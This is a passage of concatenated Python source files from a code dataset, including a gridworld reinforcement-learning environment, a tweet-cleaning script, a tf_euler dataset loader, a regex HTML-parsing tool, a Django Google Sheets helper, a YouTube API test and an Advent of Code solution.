else:\n rowArray.append(col)\n if col == \"1\":\n self.walls.append((i, j))\n # possible positions\n else:\n self.possiblePositions.append((i, j))\n self.grid.append(rowArray)\n self.m = i + 1\n\n self._find_hallWays()\n\n def _find_hallWays(self):\n self.hallwayStates = []\n for x, y in self.possiblePositions:\n if ((self.grid[x - 1][y] == 1) and (self.grid[x + 1][y] == 1)) or \\\n ((self.grid[x][y - 1] == 1) and (self.grid[x][y + 1] == 1)):\n self.hallwayStates.append((x, y))\n\n def _get_grid_value(self, position):\n return self.grid[position[0]][position[1]]\n\n # specific for self.MAP\n def _getRoomNumber(self, state=None):\n if state == None:\n state = self.state\n # if state isn't at hall way point\n xCount = self._greaterThanCounter(state, 0)\n yCount = self._greaterThanCounter(state, 1)\n room = 0\n if yCount >= 2:\n if xCount >= 2:\n room = 2\n else:\n room = 1\n else:\n if xCount >= 2:\n room = 3\n else:\n room = 0\n\n return room\n\n def _greaterThanCounter(self, state, index):\n count = 0\n for h in self.hallwayStates:\n if state[index] > h[index]:\n count = count + 1\n return count\n\n def _draw_agent(self, ax, x, y, dir, color='black'):\n triangle = np.zeros((3,2))\n \n if dir == self.directions.up:\n triangle[0] = [x+0.5,y+0.2]\n triangle[1] = [x+0.25,y+0.8]\n triangle[2] = [x+0.75,y+0.8]\n if dir == self.directions.down:\n triangle[0] = [x+0.5,y+0.8]\n triangle[1] = [x+0.25,y+0.2]\n triangle[2] = [x+0.75,y+0.2]\n if dir == self.directions.right:\n triangle[0] = [x+0.8,y+0.5]\n triangle[1] = [x+0.2,y+0.25]\n triangle[2] = [x+0.2,y+0.75]\n if dir == self.directions.left:\n triangle[0] = [x+0.2,y+0.5]\n triangle[1] = [x+0.8,y+0.25]\n triangle[2] = [x+0.8,y+0.75]\n\n ax.add_patch(plt.Polygon(triangle, color=color))\n \n def _draw_cell(self, ax, x, y, cell, color='black'):\n pos = x, y\n for wall in cell:\n x, y = pos\n if wall == \"T\":\n dx = 1\n dy = 0\n if wall == \"R\":\n x += 1\n dx = 0\n dy = 1\n if wall == \"D\":\n y += 1\n dx = 1\n dy = 0\n if wall == \"L\":\n dx = 0\n dy = 1\n\n ax.add_patch(ax.arrow(x, # x1\n y, # y1\n dx, # x2 - x1\n dy, # y2 - y1\n facecolor=color,\n edgecolor=color,\n width=0.1,\n head_width=0.0,\n )\n )\n\n def _draw_action(self, ax, x, y, action, color='black'):\n if action == self.actions.up:\n x += 0.5\n y += 1\n dx = 0\n dy = -0.4\n if hasattr(self.actions, 'down') and action == self.actions.down:\n x += 0.5\n dx = 0\n dy = 0.4\n if action == self.actions.right:\n y += 0.5\n dx = 0.4\n dy = 0\n if action == self.actions.left:\n x += 1\n y += 0.5\n dx = -0.4\n dy = 0\n if action == self.actions.done:\n x += 0.5\n y += 0.5\n dx = 0\n dy = 0\n \n ax.add_patch(patches.Circle((x, y), radius=0.25, fc=color, transform=ax.transData))\n return\n\n ax.add_patch(ax.arrow(x, # x1\n y, # y1\n dx, # x2 - x1\n dy, # y2 - y1\n facecolor=color,\n edgecolor=color,\n width=0.005,\n head_width=0.4,\n )\n )\n\n def _draw_reward(self, ax, x, y, action, reward, cmap):\n x += 0.5\n y += 0.5\n triangle = np.zeros((3,2))\n triangle[0] = [x,y]\n \n if action == self.actions.up:\n triangle[1] = [x-0.5,y-0.5]\n triangle[2] = [x+0.5,y-0.5]\n if hasattr(self.actions, 'down') and action == self.actions.down:\n triangle[1] = [x-0.5,y+0.5]\n triangle[2] = [x+0.5,y+0.5]\n if action == self.actions.right:\n triangle[1] = [x+0.5,y-0.5]\n triangle[2] = [x+0.5,y+0.5]\n if action == self.actions.left:\n triangle[1] = [x-0.5,y-0.5]\n triangle[2] = [x-0.5,y+0.5]\n if action == self.actions.done: \n ax.add_patch(plt.Circle((x, y), radius=0.25, color=cmap(reward)))\n return\n\n ax.add_patch(plt.Polygon(triangle, color=cmap(reward)))\n\n\n def _gridmap_to_img(self, goal=None):\n row_size = len(self.grid)\n col_size = len(self.grid[0])\n\n obs_shape = [row_size, col_size, 3]\n\n img = np.zeros(obs_shape)\n\n gs0 = int(img.shape[0] / row_size)\n gs1 = int(img.shape[1] / col_size)\n for i in range(row_size):\n for j in range(col_size):\n for k in range(3):\n if False and (i, j) == self.position:#start_position:\n this_value = COLOURS[10][k]\n else:\n cell = self.grid[i][j]\n if cell == 0 or cell == 1:\n colour_number = int(cell)\n else:\n colour_number = 0\n this_value = COLOURS[colour_number][k]\n img[i * gs0:(i + 1) * gs0, j * gs1:(j + 1)\n * gs1, k] = this_value\n return img\n\n\n### Defining tasks over the environment\n\npredicates = {\n '1room': lambda state: state[3][0][0],\n '2room': lambda state: state[3][1][0],\n '3room': lambda state: state[3][2][0],\n '4room': lambda state: state[3][3][0],\n 'sdoor': lambda state: \"s\" in state[2],\n 'ndoor': lambda state: \"n\" in state[2],\n 'edoor': lambda state: \"e\" in state[2],\n 'wdoor': lambda state: \"w\" in state[2],\n}\n\nclass Task(gym.core.Wrapper):\n def __init__(self, env, predicates=predicates, task_goals=[], rmax=10, rmin=-0.1, start_position=None, start_direction=None):\n super().__init__(env)\n \n self.env.start_position = start_position\n self.start_direction = start_direction\n self.task_goals = task_goals\n self.rmax = rmax\n self.rmin = rmin\n \n # self.env.actions['DONE'] = len(self.env.actions) \n # self.env.action_space = spaces.Discrete(env.action_space.n+1)\n\n self.predicates = predicates\n self.predicate_keys =tuple(sorted(list(self.predicates.keys())))\n self.goals = [self.goal_predicates(i) for i in range(2**len(self.predicate_keys))]\n self.goal_space = spaces.Discrete(len(self.goals))\n\n self.state = None\n \n def reset(self):\n self.state = self.env.reset() \n return self.state\n \n def step(self, action):\n if action == self.actions.done:\n state = self.get_goal(self.state)\n reward = self._get_reward(state)\n done = True\n info = {}\n else:\n state, reward, done, info = self.env.step(action)\n self.state = state\n \n return state, reward, done, info\n \n def get_goal(self, state): # Labelling function\n goal = ''\n for predicate in self.predicate_keys:\n goal += str(0+self.predicates[predicate](state))\n\n return int(goal, 2)\n \n def predicates_goal(self, predicates):\n goal = ''\n for predicate in self.predicate_keys:\n goal += '1' if predicate in predicates else '0'\n\n return int(goal, 2)\n \n def goal_predicates(self, goal):\n goal = bin(goal)[2:]\n goal = '0'*(len(self.predicate_keys)-len(goal)) + goal\n predicates = set()\n for i in range(len(self.predicate_keys)-1,-1,-1):\n if goal[i] == '1':\n predicates.add(self.predicate_keys[i])\n\n return predicates\n \n def _get_reward(self, goal):\n return self.rmax if (goal in self.task_goals) else self.rmin \n\n def render(self, **kwargs):\n return self.env.render(**kwargs) \n","repo_name":"tamlinlove/kuricomposition","sub_path":"kuri_composition/kuri_composition_TL/env/GridWorld.py","file_name":"GridWorld.py","file_ext":"py","file_size_in_byte":21579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"29101680074","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Tue Sep 22 23:35:12 2020\r\n\r\n@author: namratabakre\r\n\"\"\"\r\nimport tweepy\r\nimport json\r\nfrom datetime import datetime, timedelta\r\nimport re\r\nimport demoji\r\n#import datetime,time\r\nfrom dateutil.parser import parse\r\n#from datetime import datetime, timedelta\r\n#import pandas as pd\r\nimport glob\r\n\r\nretweets = []\r\ntweets_list = []\r\npoi = []\r\n\r\n\r\n\r\ndef hour_rounder(t):\r\n # Rounds to nearest hour by adding a timedelta hour if minute >= 30\r\n return (t.replace(second=0, microsecond=0, minute=0, hour=t.hour)\r\n + timedelta(hours=t.minute // 30))\r\n\r\n\r\ndate = hour_rounder(datetime.now()) # i/p\r\noutput_date = date.strftime(\"%Y-%m-%dT%H:%M:%SZ\")\r\n\r\n# rx = re.compile(pattern = \"(\\u00a9|\\u00ae|[\\u2000-\\u3300]|\\ud83c[\\ud000-\\udfff]|\\ud83d[\\ud000-\\udfff]|\\ud83e[\\ud000-\\udfff])\", flags = re.UNICODE) \r\n# regrex_pattern = re.compile(pattern = \"[\"\r\n# u\"\\U0001F600-\\U0001F64F\" # emoticons\r\n# u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\r\n# u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\r\n# u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\r\n# \"]+\", flags = re.UNICODE)\r\n\r\nrx = re.compile(\"[\"\r\n u\"\\U0001F600-\\U0001F64F\" # emoticons\r\n u\"\\U0001F300-\\U0001F5FF\" # symbols & pictographs\r\n u\"\\U0001F680-\\U0001F6FF\" # transport & map symbols\r\n u\"\\U0001F1E0-\\U0001F1FF\" # flags (iOS)\r\n u\"\\U00002500-\\U00002BEF\" # chinese char\r\n u\"\\U00002702-\\U000027B0\"\r\n u\"\\U00002702-\\U000027B0\"\r\n u\"\\U000024C2-\\U0001F251\"\r\n u\"\\U0001f926-\\U0001f937\"\r\n u\"\\U00010000-\\U0010ffff\"\r\n u\"\\u2640-\\u2642\"\r\n u\"\\u2600-\\u2B55\"\r\n u\"\\u200d\"\r\n u\"\\u23cf\"\r\n u\"\\u23e9\"\r\n u\"\\u231a\"\r\n u\"\\ufe0f\" # dingbats\r\n u\"\\u3030\"\r\n \"]+\", re.UNICODE)\r\n \r\ndef remove_emoji(text):\r\n # tmp = regrex_pattern.findall(text)\r\n # tmp.extend()\r\n # return regrex_pattern.sub(r'', text), tmp\r\n return rx.sub(r'', text), rx.findall(text)\r\n \r\nemojfilter = re.compile(\r\n pattern=\"(\\:\\w+\\:|\\<[\\/\\\\]?3|[\\(\\)\\\\\\D|\\*\\$][\\-\\^]?[\\:\\;\\=]|[\\:\\;\\=B8][\\-\\^]?[3DOPp\\@\\$\\*\\\\\\)\\(\\/\\|])(?=\\s|[\\!\\.\\?]|$)\")\r\nurlfilter = re.compile(pattern=\"(?Phttps?://[^\\s]+)\")\r\n\r\ndef remove_entities(obj, text):\r\n cleaned = text\r\n _id = str(obj['id'])\r\n urls = obj['entities']['urls']\r\n hashtags = obj['entities']['hashtags']\r\n mentions = obj['entities']['user_mentions']\r\n hashtags_res = []\r\n mentions_res = []\r\n urls_res = []\r\n\r\n if urls:\r\n for url in urls:\r\n cleaned = cleaned.replace(url['url'], '')\r\n urls_res.append(url['url'])\r\n else:\r\n urltmp = urlfilter.findall(cleaned)\r\n if urltmp:\r\n urls_res.extend(urltmp)\r\n cleaned = urlfilter.sub(r'', cleaned)\r\n\r\n if hashtags:\r\n for h in hashtags:\r\n ix = h['indices']\r\n cleaned = cleaned.replace(text[ix[0]:ix[1]], '')\r\n hashtags_res.append(h['text'])\r\n\r\n if mentions:\r\n for m in mentions:\r\n ix = m['indices']\r\n cleaned = cleaned.replace(text[ix[0]:ix[1]], '')\r\n mentions_res.append(m['screen_name'])\r\n\r\n cleaned, emoticons = remove_emoji(cleaned)\r\n\r\n tmp, emojis = emojfilter.sub(r'', cleaned), emojfilter.findall(cleaned)\r\n '''if not tmp:\r\n logger(f'ID {_id} text {text} cleaned {cleaned}, tmp {tmp}, emojis {\"\".join(emojis)}')'''\r\n emoticons = emoticons + emojis\r\n cleaned = tmp\r\n\r\n # Use solr stop word removeer\r\n\r\n return cleaned, emoticons, urls_res, mentions_res, hashtags_res\r\n\r\nke = ['profile_background_color', 'profile_link_color', 'profile_sidebar_border_color', 'profile_sidebar_fill_color',\r\n 'profile_text_color']\r\n\r\n\r\ndef clean_color(j):\r\n for k in ke:\r\n j['user'][k] = '#' + str(j['user'][k])\r\n if(j.get('retweeted_status') != None):\r\n temp = j.get('retweeted_status')\r\n j['retweeted_status']['user'][k] = '#' + str(j['retweeted_status']['user'][k])\r\n if(temp.get('quoted_status')!= None):\r\n j['retweeted_status']['quoted_status']['user'][k] = '#' + str(j['retweeted_status']['quoted_status']['user'][k])\r\n \r\n #print(j['retweeted_status']['user'][k])\r\n #break\r\n if(j.get('quoted_status') != None):\r\n j['quoted_status']['user'][k] = '#' + str(j['quoted_status']['user'][k])\r\n \r\n '''if(j.get('retweeted_status') != None):\r\n temp = j.get('retweeted_status')\r\n if(temp.get('quoted_status') != None):\r\n temp1 = temp.get('quoted_status')\r\n if(temp1.get(k) != None):\r\n j['user']['retweeted_status']['quoted_status'][k] = '#' + str(j['user']['retweeted_status']['quoted_status'][k])'''\r\n return j\r\n\r\ndef json_creator1(ip_files,outputfilename,country):\r\n #text_xx, tweet_emoticons, tweet_urls, tweet_mentions, tweet_hashtags = remove_entities(j, j['tweet_text'])\r\n with open(outputfilename, \"w\") as write_file:\r\n for ip_json in ip_files:\r\n \r\n #ip_json = json.loads(ip_json)\r\n \r\n #print(ip_json)\r\n #break\r\n xx = 'en' if ip_json['lang'] not in ['en', 'hi', 'it'] else ip_json['lang']\r\n text_xx, tweet_emoticons, tweet_urls, tweet_mentions, tweet_hashtags = remove_entities(ip_json, ip_json['text'])\r\n \r\n ip_json['poi_name'] = None\r\n ip_json['poi_id'] = None\r\n ip_json['country'] = country\r\n ip_json['tweet_text'] = ip_json['text']\r\n ip_json['tweet_lang'] = ip_json['lang']\r\n ip_json[f'text_{xx}'] = text_xx,\r\n ip_json['hashtags'] = tweet_hashtags,\r\n ip_json['mentions'] = tweet_mentions\r\n ip_json['tweet_urls'] = tweet_urls\r\n ip_json['tweet_emoticons'] = tweet_emoticons\r\n ip_json['tweet_date'] = datetime.strftime(datetime.strptime(ip_json['created_at'],'%a %b %d %H:%M:%S +0000 %Y'), '%Y-%m-%d %H:%M:%S')\r\n ip_json = clean_color(ip_json)\r\n #print(ip_json)\r\n \r\n '''data = {\r\n \t\"poi_name\":None,\r\n \t\"poi_id\":None,\r\n \t\"country\": country,\r\n \t\"tweet_text\":ip_json['text'],\r\n \t\"tweet_lang\":ip_json['lang'],\r\n f'text_{xx}':text_xx,\r\n \t#\"text_xx\":text_xx,\r\n \t\"hashtags\":tweet_hashtags,\r\n \t\"mentions\":tweet_mentions,\r\n \t\"tweet_urls\":tweet_urls,\r\n \t\"tweet_emoticons\":tweet_emoticons,\r\n \"tweet_date\": datetime.strftime(datetime.strptime(ip_json['created_at'],'%a %b %d %H:%M:%S +0000 %Y'), '%Y-%m-%d %H:%M:%S')\r\n }'''\r\n json.dump(ip_json, write_file)\r\n #print(ip_json)\r\n write_file.close()\r\n \r\n\r\ndef read_data(filenames):\r\n json_data=[]\r\n for i in filenames:\r\n print(i)\r\n file = open(i,'rb')\r\n print('success')\r\n for line in file:\r\n json_line=json.loads(line)\r\n #print('Type of json line',type(json_line))\r\n #break\r\n json_data.append(json_line)\r\n \r\n \r\n print('success1')\r\n return json_data\r\n \r\n \r\n \r\n\r\n\r\ndef getRetweets():\r\n \r\n #json_creator1('C:\\Users\\ashis\\Desktop\\mytest.json','USAReady.json','USA')\r\n #f=open ('/Users/namratabakre/Documents/Fall_Semester2020/IR/IR_Project1/FinalTest/In.json', 'r')\r\n filenames_India = glob.glob(\"/Users/namratabakre/Documents/Fall_Semester2020/IR/IR_Project1/IndiaData/IndiaData*.json\")\r\n print(len(filenames_India))\r\n India_Data = read_data(filenames_India)\r\n print(len(India_Data))\r\n #json_object = json.dumps(India_Data)\r\n #print(type(json_object))\r\n \r\n \r\n \r\n #Consolidate data into one file\r\n #with open(\"/Users/namratabakre/Documents/Fall_Semester2020/IR/IR_Project1/IndiaData/IndiaFinal.json\", \"w\",encoding=\"utf-8\") as outfile: \r\n #outfile.write(json_object) \r\n \r\n #f=open('IndiaFinal.json', \"r\")\r\n input_ = []\r\n #tweets = f.readlines()\r\n for i in India_Data:\r\n if i not in input_: # for removing duplicate tweets\r\n input_.append(i)\r\n print(len(input_))\r\n print(type(input_[0]))\r\n \r\n json_creator1(input_,'IndiaReady.json','India')\r\n #print (len(response))\r\n \r\n '''#print(i)\r\n #break\r\n a_1 = remove_hashtags(i)\r\n print(a_1)\r\n break\r\n a_2 = remove_emoji(a_1)\r\n a_3 = remove_url(a_2)\r\n #print(a_3)\r\n #break\r\n #a_4 = get_emoji_list(a_3)\r\n #print(type(a_4))\r\n a_4 = remove_user_mentions1(a_3)\r\n print(a_4)\r\n break\r\n tweets_json = json.loads(i)\r\n #cleaned, emoticons, urls_res, mentions_res, hashtags_res = remove_entities(tweets_json,tweets_json['text'])\r\n print(cleaned)\r\n break\r\n \r\n #print(tweets_json.keys())\r\n txt = tweets_json['text']\r\n if(txt.startswith('RT')):\r\n retweets.append(tweets_json)\r\n else:\r\n tweets_list.append(tweets_json)\r\n \r\n\r\ndemoji.download_codes()\r\ngetRetweets()\r\nprint(len(retweets))\r\nprint(len(tweets_list))'''\r\ngetRetweets()","repo_name":"NamrataBakre/Information-Retrieval","sub_path":"Project1/PA1.py","file_name":"PA1.py","file_ext":"py","file_size_in_byte":9393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"47"} +{"seq_id":"27816182804","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nfrom tf_euler.python.dataset.ppi import ppi\nfrom tf_euler.python.dataset.reddit import reddit\nfrom tf_euler.python.dataset.test_data import test_data\nfrom tf_euler.python.dataset.cora import cora\nfrom tf_euler.python.dataset.pubmed import pubmed\nfrom tf_euler.python.dataset.citeseer import citeseer\nfrom tf_euler.python.dataset.fb15k import FB15K\nfrom tf_euler.python.dataset.fb15k237 import FB15K237\nfrom tf_euler.python.dataset.wn18 import WN18\nfrom tf_euler.python.dataset.mutag import MUTAG\nfrom tf_euler.python.dataset.ml_1m import MovieLens_1M\n\n\ndef get_dataset(data_name):\n data_name = data_name.lower()\n if data_name == 'ppi':\n print('dataset is ppi')\n return ppi()\n elif data_name == 'reddit':\n print('dataset is reddit')\n return reddit()\n elif data_name == 'test_data':\n print('dataset is test_data')\n return test_data()\n elif data_name == 'cora':\n print('dataset is cora')\n return cora()\n elif data_name == 'pubmed':\n print('dataset is pubmed')\n return pubmed()\n elif data_name == 'citeseer':\n print('dataset is citeseer')\n return citeseer()\n elif data_name == 'fb15k':\n print('dataset is fb15k')\n return FB15K()\n elif data_name == 'fb15k-237':\n print('dataset is fb15k-237')\n return FB15K237()\n elif data_name == 'wn18':\n print('dataset is wn18')\n return WN18()\n elif data_name == 'mutag':\n print('dataset is mutag')\n return MUTAG()\n elif data_name == 'movielens-1m':\n print('dataset is movielens-1m')\n return MovieLens_1M()\n else:\n raise RuntimeError('Failed to get dataset. \\\n Dataset name must be one of \\\n [ppi/reddit/cora/pubmed/citeseer/test_data/fb15k/MUTAG]')\n","repo_name":"alibaba/euler","sub_path":"tf_euler/python/dataset/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":2865,"dataset":"github-code","pt":"47"} +{"seq_id":"33705884072","text":"# Command line arguments\nimport argparse\n\n# Nice printing for dictionaries\nimport json\n\n# Regular expressions\nimport re\n\n\n\n\n# Initialize parser.\nparser = argparse.ArgumentParser(\n description = 'Search for regular expressions in a file.',\n add_help = False\n)\n\n# Adding arguments\n# Source: https://stackoverflow.com/questions/39047075/reorder-python-argparse-argument-groups/39047348\n\nrequiredNamed = parser.add_argument_group('required named arguments')\n\nrequiredNamed.add_argument(\n '-m', \n '--method', \n help = 'Which regex search option to use. The options are \\'all_matches\\', \\'first_match\\'.', \n required = True\n)\n\nrequiredNamed.add_argument(\n '-r', \n '--regex', \n help = 'The regex to use when searching --text.', \n required = True\n)\n\nrequiredNamed.add_argument(\n '-t', \n '--text', \n help = 'What text to search. Should be a file.', \n required = True\n)\n\n\n\n\noptional = parser.add_argument_group('optional arguments')\n\noptional.add_argument(\n '-h', \n '--help', \n action = 'help', \n help = 'Show this help message and exit.'\n)\n\noptional.add_argument(\n '-c', \n '--comparison-file', \n help = 'Which file to compare results to.'\n)\n\noptional.add_argument(\n '-n', \n '--negatives-file', \n help = 'Which file contains the true negatives.'\n)\n\noptional.add_argument(\n '-o', \n '--objects', \n action = 'store_true',\n help = 'Pass match objects from search. Default is FALSE.',\n)\n\noptional.add_argument(\n '-p', \n '--print-matches', \n action = 'store_true',\n help = 'Print the match list.',\n)\n\n# optional.add_argument(\n# '-w', \n# '--write-matches', \n# action = 'store_true',\n# help = 'Write the matches to file.',\n# )\n\n# Read arguments from command line.\nargs = parser.parse_args()\n\n\n\n\n# The class to make the requests\nclass Regex:\n\n\n \"\"\"Regex functions\"\"\"\n \n\n # Searcher, file-independent\n def searcher(\n self,\n return_match_objects,\n search_method,\n search_regex,\n search_text,\n ):\n\n \"\"\"Actual searching\"\"\"\n \n # Kick back the matches, but first, fix\n # the regex to search for.\n\n # Complex...\n # Source: https://stackoverflow.com/a/55810892\n regex_update = rf\"{search_regex}\"\n\n # Tell the user what the search string is.\n print('\\nSearch string: ' + regex_update + '\\n')\n \n # Do a search based on the method provided.\n if search_method == 'all_matches':\n \n # Kick back only the matches, or the match objects?\n if return_match_objects is True:\n\n # Use the iterable.\n # Source: https://stackoverflow.com/questions/4697882/how-can-i-find-all-matches-to-a-regular-expression-in-python/4697884#4697884\n return re.finditer(\n pattern = regex_update,\n string = search_text\n )\n\n else:\n\n return re.findall(\n pattern = regex_update, \n string = search_text\n )\n\n elif search_method == 'first_match':\n\n # Kick back only the matches, or the match objects?\n if return_match_objects is True:\n\n # Kick back the match object.\n return re.search(\n pattern = regex_update,\n string = search_text\n )\n\n else:\n\n # Only kick back the group as a LIST\n # to keep return types consistent\n # with the 'all_matches' option.\n return [\n re.search(\n pattern = regex_update,\n string = search_text\n ).group()\n ]\n \n\n # regex search\n def regex_search(\n self,\n return_match_objects,\n search_method,\n search_regex,\n search_text,\n ):\n\n \"\"\"Try to load a file\"\"\"\n\n # Try to get the file and search it.\n try:\n\n # errors=\"ignore\" required on windows\n # Source: https://stackoverflow.com/a/50709581\n with open(search_text, 'r', errors = 'ignore') as f:\n \n # Completely remove newlines, making one massive\n # string.\n massive = ''.join([i.strip() for i in f.readlines()])\n\n # Ask for the matches.\n return self.searcher(\n return_match_objects = return_match_objects,\n search_method = search_method,\n search_regex = search_regex,\n search_text = massive\n )\n \n except FileNotFoundError:\n\n print('File not found! Quitting...')\n\n\n\n\n# --- MAIN --- #\n\n\n\n\n# Instantiate the class.\nrgx = Regex()\n\n# See if we can find the regex.\ntest = rgx.regex_search(\n return_match_objects = args.objects,\n search_method = args.method,\n search_regex = args.regex,\n search_text = args.text\n)\n\n# print(test)\nprint(len(test))\n\nprint('^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^')\n\n# Create a dictionary to hold the database name\n# and IDs.\ndb_links = {}\n\n# Process a list of possible hits.\nfor t in test:\n \n print('---------------------------')\n \n # The HTML structure reveals that the database IDs\n # occur within a structure. In particular,\n # database IDs are LINKED, so look for the database name\n # and the database link only.\n print(t)\n # We can split on the i match.\n structured_search = rgx.searcher(\n return_match_objects = True,\n search_method = 'all_matches',\n search_regex = '(.*?)i(.*?)<\\/tr>',\n search_text = t\n )\n\n for m in structured_search:\n print('***************************')\n print(m.group())\n\n # Get the position of the match, then partition\n # the string based on this position.\n match_position = m.group().index('i')\n print('match_position: ' + str(match_position))\n \n print('@@@@@@@@@@@@@@')\n dbname = m.group()[0:match_position]\n links = m.group()[match_position+12:]\n print(dbname)\n print('%%%%%%%%%%%%%%%%%%%%%')\n print(links)\n print('###################')\n \n # Now find the last '>' FROM THE END.\n # Source: https://www.tutorialspoint.com/python/string_rfind.htm\n last_char_search = dbname.rfind('>')\n\n if last_char_search != -1:\n \n # Just keep the last part of the string\n # past the match.\n print('DATABASE NAME')\n print(dbname[last_char_search+1:])\n\n # Add to the results.\n if dbname[last_char_search+1:] not in db_links:\n db_links[dbname[last_char_search+1:]] = []\n \n # Find the links after the sup tags.\n links_search = rgx.searcher(\n return_match_objects = True,\n search_method = 'all_matches',\n search_regex = '(.*?)(.*?)<\\/a>',\n search_text = links\n )\n\n # Go over each potential link match.\n for lm in links_search:\n\n # Split on the .\n a_split = lm.group().split('')\n\n for a in a_split:\n\n # Now just keep characters from the\n # right side, like above.\n last_char_search_links = a.rfind('>')\n\n if last_char_search_links != -1:\n\n # Append.\n print('Attempt to append...')\n print(db_links[dbname[last_char_search+1:]])\n print(a[last_char_search+1:])\n db_links[dbname[last_char_search+1:]].append(a[last_char_search_links+1:])\n print('~~~~~~~~')\n print(a[last_char_search_links+1:])\n\n print('&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&')\n\n# Quick and dirty method to get the unique values\n# from db_links.\ndb_links_keys = db_links.keys()\n\npretty = {}\n\nfor k in db_links_keys:\n pretty[k] = list(set(db_links[k]))\n\n# Print it nice and pretty.\nprint(\n json.dumps(\n pretty,\n indent = 4,\n sort_keys = True\n )\n)","repo_name":"chrisarmstrong151/workshop_extension","sub_path":"workshop_1/design_challenge/design_challenge_chris_solution.py","file_name":"design_challenge_chris_solution.py","file_ext":"py","file_size_in_byte":8380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"39022211852","text":"import google_auth_oauthlib.flow\n\nfrom django.db import DEFAULT_DB_ALIAS, connections\nfrom django.core import exceptions\n\nfrom sheets_db.backend import base\n\n\nGOOGLE_SCOPES = ['https://www.googleapis.com/auth/spreadsheets']\n\n\ndef _get_flow(alias):\n db_backend = connections[alias]\n if not isinstance(db_backend, base.DatabaseWrapper):\n raise exceptions.ImproperlyConfigured(\n 'Configured database is not Google Sheets backend')\n return google_auth_oauthlib.flow.Flow.from_client_secrets_file(\n db_backend.settings_dict['APP_SECRET'], scopes=GOOGLE_SCOPES)\n\n\ndef get_db_configuration_url(callback_uri, alias=DEFAULT_DB_ALIAS):\n flow = _get_flow(alias)\n flow.redirect_uri = callback_uri\n url, state = flow.authorization_url(access_type='offline')\n return url\n\n\ndef is_db_configured(alias=DEFAULT_DB_ALIAS):\n db_backend = connections[alias]\n db_backend.ensure_connection()\n return db_backend.connection.configured\n\n\ndef configure_db(request, alias=DEFAULT_DB_ALIAS, callback_uri=None):\n user_code = request.GET['code']\n flow = _get_flow(alias)\n callback_uri = callback_uri or \\\n f'{request.scheme}://{request.headers[\"HOST\"]}{request.path}'\n flow.redirect_uri = callback_uri\n flow.fetch_token(code=user_code)\n db_backend = connections[alias]\n db_backend.ensure_connection()\n db_backend.connection.configure(flow.credentials)\n","repo_name":"kozzztik/pm_viewer","sub_path":"sheets_db/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":1408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"47"} +{"seq_id":"26619003837","text":"import sys\nimport os\nsys.path.append('../')\nimport unittest\nfrom unittest.mock import patch\nimport requests\n\nfrom youtube_api import YouTubeDataAPI\n\nclass TestAPI(unittest.TestCase):\n\n @classmethod\n def setUpClass(cls):\n cls.key = os.environ.get('YT_KEY')\n cls.wrong_key = 'xxxxxxxxx'\n cls.yt = YouTubeDataAPI(cls.key, timeout=10)\n\n\n def test_init(self):\n '''#Verified by Megan Brown on 11/30/2018'''\n with self.assertRaisesRegex(ValueError, 'No API key used to initate the class.'):\n yt = YouTubeDataAPI('')\n\n with self.assertRaisesRegex(ValueError, 'The API Key is invalid'):\n yt = YouTubeDataAPI(self.wrong_key)\n\n\n @patch('requests.get')\n def test_verify(self, mock_request):\n '''#verified by Megan Brown on 11/30/2018'''\n mock_resp = requests.models.Response()\n mock_resp.status_code = 404\n mock_request.return_value = mock_resp\n\n self.assertEqual(self.yt.verify_key(), False)\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"SMAPPNYU/youtube-data-api","sub_path":"tests/test_initialization.py","file_name":"test_initialization.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","stars":76,"dataset":"github-code","pt":"47"} +{"seq_id":"4008335268","text":"# we have pairings of sensors and beacons. Sensors know the location of the closest beacon. Because it's the 'closest' we know no position inside the same radius is a beacon. Since we know this, we can mark the radius around each sensor as unable to contain a beacon. Then we can do this for every sensor, then check the target line and see how many spots are taken up by marks.\n\n#Okay I solved pt 1 by just checking which sets of deltas between sensor coords and their respective beacons added and minused to their sensor's y coordinate would cross the chosen y_line, then calculated the spread of non-beacon area based on how far across past the y_line the delta reached. So not brute force.\n\n#Part two I'm having trouble understanding exactly what they're asking for. Okay so it seems like they're asking for a singular position that will be open when you run this algorithm across a space of 4,000,000 square spaces, starting from 0 for both x and y values. I may have to optimize.\n\nfrom re import findall\n\ni_n, useful, y_line, not_beacons, offset, total = list(list(map(int, findall(r\"-?\\d+\", l))) for l in open('2022/15/input.txt').read().splitlines()), [], 10, ['_' for _ in range(30)], 0, 0\n\n\n\nfor coords in i_n:\n delta = abs(coords[0] - coords[2]) + abs(coords[1] - coords[3])\n if (y_line - coords[1] >= 0 and coords[1] + delta >= y_line) or (y_line - coords[1] < 0 and coords[1] - delta <= y_line):\n useful.append(((coords[0], coords[1]), delta))\n if coords[3] == y_line:\n not_beacons[coords[2] + offset] = 'O'\n\nprint(useful)\n\n\nfor coords, delta in useful:\n if y_line - coords[1] > 0:\n coverage = (coords[1] + delta) - y_line\n elif y_line - coords[1] < 0:\n coverage = y_line - (coords[1] - delta)\n else:\n not_beacons[coords[0] + offset] = 'O'\n coverage = delta\n for pos in range(0, coverage + 1):\n not_beacons[coords[0] + pos + offset] = '#' if not_beacons[coords[0] + pos + offset] != 'O' else 'O'\n for neg in range(0, -coverage - 1, -1):\n not_beacons[coords[0] + neg + offset] = '#' if not_beacons[coords[0] + neg + offset] != 'O' else 'O'\n \nfor item in not_beacons:\n if item == '#':\n total += 1\n\n# print(not_beacons)\nprint(total)\n 